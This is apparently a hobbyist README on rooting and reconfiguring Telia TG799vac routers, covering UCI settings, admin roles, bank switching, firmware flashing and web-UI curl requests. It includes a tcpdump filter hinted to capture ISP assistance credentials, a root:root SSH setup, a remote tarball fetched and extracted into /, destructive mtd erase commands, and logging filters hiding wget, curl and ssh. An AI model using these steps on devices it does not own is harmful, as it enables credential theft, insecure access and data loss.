list log_filter 'openvpn'
list log_filter 'netifd'
list log_filter 'wansensing'
list log_filter 'miniupnpd'
list log_filter 'user.info'
list log_filter 'guest'
list log_filter 'wget'
list log_filter 'curl'
list log_filter 'ssh'
list log_filter 'sshd'
list log_filter 'telnet'
list log_filter 'http'
list log_filter 'https'
list log_filter 'ftp'
list log_filter 'ftpd'
list log_filter 'uci'
list log_filter 'postmortem'
list log_filter 'trafficmon.voip'
config timeserver 'ntp'
option enable_server '1'
option program '/sbin/firstusedate'
list server 'ntp1.rgw.telia.se'
list server 'ntp2.rgw.telia.se'
list server '0.se.pool.ntp.org'
list server '1.se.pool.ntp.org'
list server '2.se.pool.ntp.org'
list server '3.se.pool.ntp.org'
list server 'time.google.com'
list server 'time1.google.com'
list server 'time2.google.com'
list server 'time3.google.com'
list server 'time4.google.com'
config config config
option export_plaintext '1'
option export_unsigned '1'
option import_plaintext '1'
option import_unsigned '1'
option usb_filesystem_charset 'utf8'
config coredump
option path '/root'
option url 'https://telia-core.tgwfd.org:5443/'
option action 'ignore'
option reboot '0'
config log 'logread'
option path 'logread'
config trafficmon
option interface 'wan'
option minute '*/720'
config trafficmon
option interface 'mgmt'
option minute '*/720'
config trafficmon
option interface 'voip'
option minute '*/720'
config trafficmon
option interface 'iptv'
option minute '*/720'
option sw_reboot_count '0'
config time 'time'
EOF
- Now you must restart system init and it's done
/etc/init.d/system restart
- This is a simple server configuration for
Gentoo Linuxsince that is the only distro I am using but no worries, it probably work for most others too but extra configuration may be needed for other dists.
Just fyi, I wont give any support at all for any other distros then Gentoo and Funtoo so
please keep in mind, if you using something else this is just an example, ask your community
if you getting problems and want to get it up and running, however, this should be fine for everyone
to getting started (don't be a fool and send your logs to some random server online, use your own of course, that's what I do)
@version: 3.30
@include "scl.conf"
options {
create_dirs(yes);
owner(wuseman);
group(wuseman);
perm(0644);
dir_owner(wuseman);
dir_group(wuseman);
dir_perm(0755);
};
source s_udp {
network (
ip-protocol(6)
transport("udp")
port(514)
);
network (
transport("udp")
port(514)
);
};
destination d_host-specific {
file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-syslog.log");
};
log {
source(s_udp);
destination(d_host-specific);
};
source src {
unix-stream("/dev/log" max-connections(256));
internal();
};
source kernsrc { file("/proc/kmsg"); };
# define destinations
destination authlog { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-auth.log"); };
destination syslog { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-syslog"); };
destination cron { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-cron.log"); };
destination daemon { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-daemon.log"); };
destination kern { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-kern.log"); };
destination lpr { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-lpr.log"); };
destination user { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-user.log"); };
destination mail { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.log"); };
destination mailinfo { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.info"); };
destination mailwarn { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.warn"); };
destination mailerr { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.err"); };
destination newscrit { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-news/news.crit"); };
destination newserr { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-news/news.err"); };
destination newsnotice { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-news/news.notice"); };
destination debug { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-debug"); };
destination messages { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-messages"); };
destination console { usertty("root"); };
destination console_all { file("/dev/tty12"); };
#destination console_all { file("/dev/console"); };
filter f_authpriv { facility(auth, authpriv); };
filter f_syslog { not facility(authpriv, mail); };
filter f_cron { facility(cron); };
filter f_daemon { facility(daemon); };
filter f_kern { facility(kern); };
filter f_lpr { facility(lpr); };
filter f_mail { facility(mail); };
filter f_user { facility(user); };
filter f_debug { not facility(auth, authpriv, news, mail); };
filter f_messages { level(info..warn)
and not facility(auth, authpriv, mail, news); };
filter f_emergency { level(emerg); };
filter f_info { level(info); };
filter f_notice { level(notice); };
filter f_warn { level(warn); };
filter f_crit { level(crit); };
filter f_err { level(err); };
filter f_failed { message("failed"); };
filter f_denied { message("denied"); };
# connect filter and destination
log { source(src); filter(f_authpriv); destination(authlog); };
log { source(src); filter(f_syslog); destination(syslog); };
log { source(src); filter(f_cron); destination(cron); };
log { source(src); filter(f_daemon); destination(daemon); };
log { source(kernsrc); filter(f_kern); destination(kern); };
log { source(src); filter(f_lpr); destination(lpr); };
log { source(src); filter(f_mail); destination(mail); };
log { source(src); filter(f_user); destination(user); };
log { source(src); filter(f_mail); filter(f_info); destination(mailinfo); };
log { source(src); filter(f_mail); filter(f_warn); destination(mailwarn); };
log { source(src); filter(f_mail); filter(f_err); destination(mailerr); };
log { source(src); filter(f_debug); destination(debug); };
log { source(src); filter(f_messages); destination(messages); };
log { source(src); filter(f_emergency); destination(console); };
# default log
log { source(src); destination(console_all); };
- Now restart system on your router and you should see * messages:
/etc/init.d/system restart
- Enable or Disable Time of Day ACL rules:
uci set tod.global.enabled='0'
- For login with debug mode enabled, then please go to (Proably not possible but it is to try):
http://192.168.1.1/?debug=1
- Enable or Disable so your router wont restart if there is an segmentation fault in a user space program:
uci set system.@coredump[0].reboot='0'
uci commit system
Just type below command for print the accesskey:
Just printing the first 8 characetrs from 0124 file
sed -e 's/^\(.\{8\}\).*/\1/' /proc/rip/0124
You can check the current running dns with
cat /etc/resolv.conf
Enable or Disable Content Sharing (Samba / DNLA):
uci set samba.samba.enabled='1'
uci set dlnad.config.enabled='1'
Disable Time of Day ACL rules
uci set tod.global.enabled='1'
To disable mobile card since there is no button, execute:
uci set mobiled.device_defaults.enabled=0
uci commit
List installed packages:
opkg list_installed
Add a new new modal:
uci set web.modalsmodalrule=rule
uci set web.ruleset_main.rules=modalsmodalsrule
uci add_list web.l2tpipsecservermodal.target='/modals/modals-name.lp'
uci set web.l2tpipsecservermodal.roles='roles'
A minimal alias definition for a bridged interface might be:
config interface lan
option 'ifname' 'eth0'
option 'type' 'bridge'
option 'proto' 'static'
option 'ipaddr' '192.168.1.1'
option 'netmask' '255.255.255.0'
config interface lan2
option 'ifname' 'br-lan'
option 'proto' 'static'
option 'ipaddr' '10.0.0.1'
option 'netmask' '255.255.255.0'
For for a non-bridge interface
config interface lan
option 'ifname' 'eth0'
option 'proto' 'static'
option 'ipaddr' '192.168.1.1'
option 'netmask' '255.255.255.0'
config interface lan2
option 'ifname' 'eth0'
option 'proto' 'static'
option 'ipaddr' '10.0.0.1'
option 'netmask' '255.255.255.0'
Use your tg799 router as a switch instead as router:
Here is my example for using all ports for local network and also wan port(5):
cat << "EOF" > /etc/config/network
config 'switch' 'eth0'
option 'enable' '1'
config 'switch_vlan' 'eth0_0'
option 'device' 'eth0'
option 'vlan' '0'
option 'ports' '4 5' #wan
config 'switch_vlan' 'eth0_1'
option 'device' 'eth0'
option 'vlan' '1'
option 'ports' '3 5' #lan 1
config 'switch_vlan' 'eth0_2'
option 'device' 'eth0'
option 'vlan' '2'
option 'ports' '2 5' #lan2
config 'switch_vlan' 'eth0_3'
option 'device' 'eth0'
option 'vlan' '3'
option 'ports' '1 5' #lan3
config 'switch_vlan' 'eth0_4'
option 'device' 'eth0'
option 'vlan' '4'
option 'ports' '0 5' #lan4
Create backup of all /dev/mtd[0-7]
Insert your usb that has ext2/ext3 or ext4 format:
for number in $(seq 0 7); do
grep -q "\/dev\/sd[a-z]1" /proc/mounts
if [[ $? = "0" ]]; then
usb_drive=$(grep "\/dev\/sd[a-z][0-9]" /proc/mounts |cut -d' ' -f1);
mkdir -p /mnt/usb/${usb_drive}/backup_mtd;
fi
dd if=/dev/mtd${number} of=/mnt/usb/${usb_drive}/backup_mtd/mtd${number}.img;
done
Result for: 17.2.0405-1441042-20191114170637-ec29699cbbf5c66c53b310489f62a141f46bf628:
mtd1.img: Squashfs filesystem, little endian, version 4.0, xz compressed, 29719215 bytes, 3791 inodes, blocksize: 262144 bytes, created: Tue May 2 15:59:58 2017
mtd2.img: ISO-8859 text, with very long lines (65536), with no line terminators
mtd3.img: data
mtd4.img: data
mtd5.img: data
mtd6.img: data
Just mount mtd1 and play around:
squashfuse mtd1.img /mnt/router/justforfun
Using bridge mode with a dedicated PPPoE ethernet port
uci set network.lan.dns='1.1.1.1'
uci set network.lan.gateway='192.168.0.254'
uci set mmpbxrvsipnet.sip_net.interface='lan'
uci set mmpbxrvsipnet.sip_net.interface6='lan6'
Add below stuff in same order as i posted them for avoid errors
List all roles admin is not added to:
uci show|grep \.roles \
|grep -v admin
```bash
uci show \
|grep \.roles \
|grep -v admin \
|cut -d'=' -f1 \
|sed 's/^/uci add_list /g' \
|sed 's/$/=admin/g'
So, now we want add admin to above roles so we can access same cards as superuser and telia.
In this order we are required to add the new settings so we can access the cards in webui
Rule > Ruleset > Modal > Target`
Set web Rules
uci set web.natalghelpermodal=rule
uci set web.relaymodal=rule
uci set web.systemmodal=rule
uci set web.iproutesmodal=rule
uci set web.mmpbxinoutgoingmapmodal=rule
uci set web.ltedoctor=rule
uci set web.ltemodal=rule
uci set web.lteprofiles=rule
uci set web.ltesim=rule
uci set web.ltesms=rule
uci set web.logconnections=rule
uci set web.logviewer=rule
uci set web.logviewer.roles=rule
uci set tod.global.enabled='1'
uci set mobiled.globals.enabled='1'
uci set mobiled.device_defaults.enabled='1'
uci commit; /etc/init.d/nginx restart
Set rulesets
uci add_list web.ruleset_main.rules=xdsllowmodal
uci add_list web.ruleset_main.rules=systemmodal
uci add_list web.ruleset_main.rules=diagnostics
uci add_list web.ruleset_main.rules=basicviewaccesscodemodal
uci add_list web.ruleset_main.rules=basicviewwifiguestmodal
uci add_list web.ruleset_main.rules=basicviewwifiguest5GHzmodal
uci add_list web.ruleset_main.rules=basicviewwifipskmodal
uci add_list web.ruleset_main.rules=basicviewwifipsk5GHzmodal
uci add_list web.ruleset_main.rules=basicviewwifissidmodal
uci add_list web.ruleset_main.rules=basicviewwifissid5GHzmodal
uci add_list web.ruleset_main.rules=relaymodal
uci add_list web.ruleset_main.rules=iproutesmodal
uci add_list web.ruleset_main.rules=mmpbxstatisticsmodal
uci commit; /etc/init.d/nginx restart
Set modal targets
uci set web.mmpbxinoutgoingmapmodal.target='/modals/mmpbx-inoutgoingmap-modal.lp'
uci set web.iproutesmodal.target='/modals/iproutes-modal.lp'
uci set web.systemmodal.target='/modals/system-modal.lp'
uci set web.relaymodal.target='/modals/relay-modal.lp'
uci set web.natalghelpermodal.target='/modals/nat-alg-helper-modal.lp'
uci set web.diagnosticstcpdumpmodal.target='/modals/diagnostics-tcpdump-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-accesscode-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifiguest-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifiguest5GHz-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifipsk-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifipsk5GHz-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifissid-modal.lp'
uci set web.natalghelpermodal.target='/modals/basicview-wifissid5GHz-modal.lp'
uci set web.ltemodal.target='/modals/lte-modal.lp'
uci set web.ltedoctor.target='/modals/lte-doctor.lp'
uci set web.lteprofiles.target='/modals/lte-profiles.lp'
uci set web.logconnections.target='/modals/log-connections-modal.lp'
uci set web.logviewer.target='/modals/logviewer-modal.lp'
uci set web.ltesms.target='/modals/lte-sms.lp'
uci set web.ltesim.target='/modals/lte-sim.lp'
uci set web.xdsllowmodal.target='/modals/xdsl-low-modal.lp'
uci commit; /etc/init.d/nginx restart
Now add admin to get access to the new rules
Show all rules were we want to add ourself (admin)
uci show|grep -i roles|grep -v admin
uci add_list web.uidefault.upgradefw_role=admin
uci add_list web.assistancemodal.roles='admin'
uci add_list web.usermgrmodal.roles='admin'
uci add_list web.todmodal.roles='admin'
uci add_list web.iproutesmodal.roles='admin'
uci add_list web.cwmpconf.roles='admin'
uci add_list web.relaymodal.roles='admin'
uci add_list web.systemmodal.roles='admin'
uci add_list web.natalghelper.roles='admin'
uci add_list web.xdsllowmodal.roles='admin'
uci add_list web.mmpbxprofilemodal.roles='admin'
uci add_list web.ltesms.roles='admin'
uci commit
/etc/init.d/nginx restart
If WEBGUI ever will get broken cause you fucked it up then reset router with 'rtfd --all (same as press on reset button)'.
If you want to keep files and just reset settings then use 'rtfd --soft' instead.
- No space left and no commands works at all? Not even rtfd?
Run below command for a full factory reset
This works for all TG799Vac devices from TeliaCompany AB EXCEPT the vdnt-o router,
vdnt- is the first generation that was released, feel free to ask if you are not 100% sure
which router do you have, I or someone else will help you just in case so you know.
mtd -r erase rootfs_data
Just for VDNT-O
mtd -r userfs
Remove telia from all roles:
uci show|egrep -i "roles.*telia"|cut -d'=' -f1|sed 's/$/=telia/g'|xargs uci del_list
Once you added above you can browse to system-modal.lp and enable/disable ssh or set router in bootp mode:
.... or enable/disable assistance by your own, just give the credenticals to telia when its needed, feels better? :)
Change port:
assistance_port="$(uci get mwan.remoteassist.dest_ip)"|cut -d '/' -f1)"
uci set web.remote.port='<port>'
Are you a sneeky bastard as myself? Cool! T
his is not far away how I got their passwords at top of this README. Figure out that part yourself.
tcpdump \
-i vlan_mgmt \
-s 0 \
-A 'tcp dst port `<assistance_port>` \
or tcp dst port 80 and tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420 or \
tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504F5354' \
and host `<vlan_mgmt_ip>`
What does this mean? I wont go deep in this part, please visit https://www.nr1.nu/ for deep tutorials for tcpdump and tshark via cli, this is just an example when we want to grab GET requrest: See below example:
Here 0x47455420 depicts the ASCII value of characters 'G' 'E' 'T' ' '
| Character | ASCII Value |
|---|---|
| G | 47 |
| E | 45 |
| T | 54 |
| SPACE | 20 |
Failsafe boot, board vdnt-o
| Time(Seconds) | Event |
|---|---|
| 00-00 | Press start |
| 00-45 | Let it boot until 45s |
| 46-60 | Press Reset button |
| Round 2 | |
| 00-00 | Press start |
| 00-45 | Let it boot until 45s |
| 46-60 | Press Reset button |
| Round 3 | |
| 00-00 | Press start |
| 00-45 | Let it boot until 45s |
| 46-60 | Press Reset button |
| Round 4 | |
| 00-00 | Press start |
| 00-45 | Let it boot until 45s |
| 46-60 | Press Reset button |
| ..... | DONE |
If everything was done correct then router have changed bank, temporary (until next reboot, you must ssh into device and change bank with below command
echo "bank_1" > /proc/bankversion/active
Failsafe boot, board vbnt-h
| Time(Seconds) | Event |
|---|---|
| 00-00 | Press start |
| 00-25 | Let it boot until 25s |
| 25-45 | Press Reset button |
| Round 2 | |
| 00-00 | Press start |
| 00-25 | Let it boot until 25s |
| 25-45 | Press Reset button |
| Round 3 | |
| 00-00 | Press start |
| 00-25 | Let it boot until 25s |
| 25-45 | Press Reset button |
| Round 4 | |
| 00-00 | Press start |
| 00-25 | Let it boot until 25s |
| 25-45 | Press Reset button |
| ..... | DONE |
If everything was done correct then router have changed bank, temporary (until next reboot, you must ssh into device and change bank with below command
echo "bank_1" > /proc/bankversion/active
System and Firmware Upgrad
- Upgrade firmware from CLI:
sysupgrade --safe -o /tmp/172339o1901024closed.rbi
- Default view:
- This is all modals that are available from Telias devices in /www/docroot when all are enabled:
- Add Administrator user to be allowed to upgrade firmwware:
uci add_list web.uidefault.upgradefw_role='admin'
uci commit
- If you will try below command you will know how it feels to work for telia a support:
This part has been moved to its own directory
uci set web.usr_Administrator.role='superuser'
uci set web.usr_Administrator.role='telia'
- System Modal
- Default banner
- When you have root access on your router you will be able to unlock
rootfs_data and install a very powerful gui vs original from
TeliaCompany ABthanks to@Ansueland all other developers that has been working so hard to get this available
curl -k https://repository.ilpuntotecnico.com/files/Ansuel/AGTEF/GUI.tar.bz2 --output /tmp/GUI.tar.bz2;
bzcat /tmp/GUI.tar.bz2 | tar -C / -xvf -;
/etc/init.d/rootdevice force;
reboot
- This is how it will look a like after you run the above command and router rebooted:
- Stats view:
- Telstra Extension:
- Current bank setup
grep . -r /proc/banktable/
/proc/banktable/notbootedoid:Unknown
/proc/banktable/bootedoid:5dcd7b8d4f5d980688c30569
/proc/banktable/passiveversion:17.2.0405-1441042-20191114170637-ec29699cbbf5c66c53b310489f62a141f46bf628
/proc/banktable/activeversion:Unknown
/proc/banktable/inactive:bank_2
/proc/banktable/active:bank_1
/proc/banktable/notbooted:bank_1
/proc/banktable/booted:bank_2
- Setup Ultimate Bank Plan
# Ensure two banks match in sizes
[ $(grep -c bank_ /proc/mtd) = 2 ] && \
[ "$(grep bank_1 /proc/mtd | cut -d' ' -f2)" = \
"$(grep bank_2 /proc/mtd | cut -d' ' -f2)" ] && {
[ "$(cat /proc/banktable/booted)" = "bank_1" ] && {
mtd -e bank_2 write /dev/$(grep bank_1 /proc/mtd | cut -d: -f1) bank_2 && \
mtd verify /dev/$(grep bank_1 /proc/mtd | cut -d: -f1) bank_2 || \
{ echo Clone verification failed, retry; exit; } }
cp -rf /overlay/$(cat /proc/banktable/booted) /tmp/bank_overlay_backup
rm -rf /overlay/*
cp -rf /tmp/bank_overlay_backup /overlay/bank_2
echo bank_1 > /proc/banktable/active
sync
mtd erase bank_1;
echo c > /proc/sysrq-trigger; }
- Checking RBI firmware signature
signature_checker -b /tmp/firmware_to_check.rbi [-k /tmp/other_board_to_check.osik]binwalk -e any_decrypted_firmware.bin
mv firmware_to_check.rbi pubkey_to_check.osik _any_decrypted_firmware.bin.extracted/squashfs-root/tmp/
cd _any_decrypted_firmware.bin.extracted/squashfs-root
cp $(which qemu-arm-static) .
sudo chroot . ./qemu-arm-static /usr/bin/signature_checker -b /tmp/firmware_to_check.rbi -k /tmp/pubkey_to_check.osik
Extract Firmware and RBI file
- Extract firmware file:
cat "15516436o1361004closed.rbi" \
|(bli_parser \
&& echo "Please wait..." \
&& (bli_unseal|dd bs=4 skip=1 seek=1 of="15516436o1361004closed.bin"))
magic_value: BLI2
fim: 23
fia: PE
prodid: 0
varid: 0
version: 0.0.0.0
data_offset: 369
data_size: 24068698
timestamp: 0x276B8E76
boardname: VDNT-O
prodname: Technicolor TG799vn v2
varname: TG799vn v2
tagparserversion: 200
flashaddress: 0xC2000000
Please wait...
- Configure
dropbearfor our upgrade so we can connect to shell viaopensshafter upgrade
mkdir -p /overlay/$(cat /proc/banktable/booted)/etc
chmod 755 /overlay/$(cat /proc/banktable/booted) /overlay/$(cat /proc/banktable/booted)/etc
echo -e "echo root:root | chpasswd
sed -i 's#/root:.*\$#/root:/bin/ash#' /etc/passwd
sed -i -e 's/#//' -e 's#askconsole:.*\$#askconsole:/bin/ash#' /etc/inittab
uci -q set \$(uci show firewall | grep -m 1 \$(fw3 -q print | \
egrep 'iptables -t filter -A zone_lan_input -p tcp -m tcp --dport 22 -m comment --comment \"!fw3: .+\" -j DROP' | \
sed -n -e 's/^iptables.\+fw3: \(.\+\)\".\+/\1/p') | \
sed -n -e \"s/\(.\+\).name='.\+'$/\1/p\").target='ACCEPT'
uci add dropbear dropbear
uci rename dropbear.@dropbear[-1]=afg
uci set dropbear.afg.enable='1'
uci set dropbear.afg.Interface='lan'
uci set dropbear.afg.Port='22'
uci set dropbear.afg.IdleTimeout='600'
uci set dropbear.afg.PasswordAuth='on'
uci set dropbear.afg.RootPasswordAuth='on'
uci set dropbear.afg.RootLogin='1'
uci set dropbear.lan.enable='0'
uci commit dropbear
/etc/init.d/dropbear enable
/etc/init.d/dropbear restart
rm /overlay/\$(cat /proc/banktable/booted)/etc/rc.local
source /rom/etc/rc.local
" > /overlay/$(cat /proc/banktable/booted)/etc/rc.local
chmod +x /overlay/$(cat /proc/banktable/booted)/etc/rc.local
sync
- Dropbear must be configured as below otherwise we wont get access (
required)
uci -q delete dropbear.afg
uci add dropbear dropbear
uci rename dropbear.@dropbear[-1]=afg
uci set dropbear.afg.enable='1'
uci set dropbear.afg.Interface='lan'
uci set dropbear.afg.Port='22'
uci set dropbear.afg.IdleTimeout='600'
uci set dropbear.afg.PasswordAuth='on'
uci set dropbear.afg.RootPasswordAuth='on'
uci set dropbear.afg.RootLogin='1'
uci commit dropbear
/etc/init.d/dropbear enable
/etc/init.d/dropbear restart
- Now it's time to write the new firmware and ugprade the router
Erase and write new firmware into booted bank and then emulate system crash to hard reboot
mtd -e $(cat /proc/banktable/booted) write "1720405o1901068closed.bin" $(cat /proc/banktable/booted)
Unlocking bank_1 ...
Erasing bank_1 ...
Writing from 1720405o1901068closed.bin to bank_1 ..
echo c > /proc/sysrq-trigger
- Don't rush, create a backup of course when you working with this kind of stuff
tar -C /overlay -cz -f /tmp/backup-$(date -I).tar.gz $(cat /proc/banktable/booted)
- Manually create an tarball with your custom configuration for your current setup
tar -C /overlay -cz -f /tmp/overlay-files-backup-$(date -I).tar.gz bank_1 bank_2
If you prefer, you can rely on sysupgrade to achieve a similar result for the booted bank only.
Create and Save the tarball in /tmp/
sysupgrade -i -b /tmp/sysupgrade-backup-$(date -I).tar.gz
- Restore a backup tarball with
sysupgrade -f
sysupgrade -f /tmp/sysupgrade-backup-*.tar.gz
Enable/Disable power LEDs on device
- Turn on power LED
echo 1 > /sys/class/leds/power:green/brightness
- Turn off LED diod
echo 0 > /sys/class/leds/power:red/brightness
If the webui is not available for some reason you can use curl to set, edit and remove settings instead
This is very intreseting since we are allowed to turn off and on interfaces, export config files and import config files, get bankSize and alot more. The only thing I didnt had any luck with YET is the ?action=upgradfw part.
-
Here is few examples
-
wiŕeless settings
curl 'http://192.168.1.1/modals/wireless-modal.lp' \
-H 'Connection: keep-alive' \
-H 'Accept: text/html, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Origin: http://192.168.1.1' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=4ed096466def33a5f7faa0a00d116d7b4f72b27c78b8377839b0885651669e0c' \
--data-raw 'admin_state=1&standard=bgn&requested_channel=auto&channelwidth20=20MHz&channelwidth40=20MHz&channelwidth80=20MHz&sgi=1&cdd=1&stbc=1&ap_enabled=1&ssid=Telia-1DAA3B&ap_broadcast_ssid=1&security=wpa2-psk&wpa_psk=D4104BC782&wep_key=899BC4B768&radius_authent_ip=&radius_authent_port=1812&radius_authent_secret=899BC4B768&radius_account_ip=&radius_account_port=1813&radius_account_secret=&wps_enabled=0&wps_device_pin_code=&radius_authent_state=&radius_account_state=&acl_mode=unlock&action=SAVE&fromModal=YES&CSRFtoken=847ed2f109f0cd1594d4aa392f4ecf3e3555129620aac7f53511787bc9d41aae' \
--compressed
- Set IPv6
enable
curl 'http://192.168.1.1/modals/ethernet-modal.lp' \
-H 'Connection: keep-alive' \
-H 'Accept: text/html, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Origin: http://192.168.1.1' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=4ed096466def33a5f7faa0a00d116d7b4f72b27c78b8377839b0885651669e0c' \
--data-raw 'localdevIP=192.168.1.1&localdevmask=255.255.255.0&localIPv6=1&dhcpv4State=server&dhcpStart=64&dhcpLimit=180&leaseTime=1h&dnsServer=192.168.1.1&action=SAVE&fromModal=YES&CSRFtoken=847ed2f109f0cd1594d4aa392f4ecf3e3555129620aac7f53511787bc9d41aae' \
--compressed
Export/Import configuration
Import backup configuration and reboot device
curl 'http://192.168.1.1/modals/gateway-modal.lp?action=import_config' \
-X 'POST' \
-H 'Connection: keep-alive' \
-H 'Content-Length: 142986' \
-H 'Cache-Control: max-age=0' \
-H 'Upgrade-Insecure-Requests: 1' \
-H 'Origin: http://192.168.1.1' \
-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFPdhvt6tT2AARW9e' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=6f39690ffb1f157ad0564201ae484f75a3f3041c2fd5b7d073b174538c9f36c2' \
--compressed \
--insecure
Export your current configuration that is in use
curl 'http://192.168.1.1/modals/gateway-modal.lp' \
-H 'Connection: keep-alive' \
-H 'Cache-Control: max-age=0' \
-H 'Upgrade-Insecure-Requests: 1' \
-H 'Origin: http://192.168.1.1' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=6f39690ffb1f157ad0564201ae484f75a3f3041c2fd5b7d073b174538c9f36c2' \
--data-raw 'action=export_config&CSRFtoken=86b6d3a28f3cb5b743662f8032d97731fed9a42028b42ab71aa15718c09b2236' \
--compressed \
--insecure
Upgrade Firmware via Curl
- import firmware
- getbanksize
- upgradfw
- upgradegfwstatus
curl 'http://192.168.1.1/modals/gateway-modal.lp?action=getbanksize' \
-H 'Connection: keep-alive' \
-H 'Accept: application/json, text/javascript, */*; q=0.01' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=0cba5e09a4e286ec6d9411538cf156f26a7530925c7107c78c1d5413b0727e7f' \
--compressed \
--insecure
curl 'http://192.168.1.1/modals/gateway-modal.lp?action=upgradefw' \
-X 'POST' \
-H 'Connection: keep-alive' \
-H 'Content-Length: 21973672' \
-H 'Cache-Control: max-age=0' \
-H 'Upgrade-Insecure-Requests: 1' \
-H 'Origin: http://192.168.1.1' \
-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLmy6iZzHQwMAbWUk' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=0cba5e09a4e286ec6d9411538cf156f26a7530925c7107c78c1d5413b0727e7f' \
--compressed
curl 'http://192.168.1.1/modals/gateway-modal.lp?action=upgradefwstatus' \
-H 'Connection: keep-alive' \
-H 'Accept: application/json, text/javascript, */*; q=0.01' \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=0cba5e09a4e286ec6d9411538cf156f26a7530925c7107c78c1d5413b0727e7f' \
--compressed \
--insecure
Set VOIP on/off
curl 'http://192.168.1.1/modals/internet-modal.lp' \
-H 'Connection: keep-alive' \
-H 'Accept: text/html, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'User-Agent: Mozilla/5.0 (MSIE 10.0; Windows NT 6.1; Trident/5.0)' \
-H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
-H 'Origin: http://192.168.1.1' \
-H 'Referer: http://192.168.1.1/gateway.lp' \
-H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
-H 'Cookie: sessionID=c3795762f8b5e8dbe105e19456c0ff145679aedbcbda28090a15d1d095be03e2' \
--data-raw 'interface=voip&uci_wan_auto=0&action=SAVE&fromModal=YES&CSRFtoken=13473a7d6cad23b9cf7aa5694ca942a0338583275f08ca6f343cac58a1352800' \
--compressed \
--insecure
